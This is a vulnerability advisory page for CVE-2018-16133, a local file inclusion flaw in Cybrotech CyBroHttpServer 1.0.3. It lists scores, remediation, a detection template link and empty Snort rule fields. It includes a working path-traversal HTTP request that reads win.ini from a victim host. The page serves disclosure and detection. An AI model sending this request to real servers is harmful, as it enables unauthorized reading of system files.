🔙 목록으로 돌아가기

CVE-2018-16133: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion

TitleCybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
Author0x_Akoko
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
RemediationApply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
CVSS Score5.3
EPSS Score0.57542
CVE IDCVE-2018-16133
CWE IDCWE-22
Tags cve2018 cve lfi packetstorm cybrotech vuln

🔍 Vulnerability Description

Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.

🌐 HTTP Request

GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: www.victim.com

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16133.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16133.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A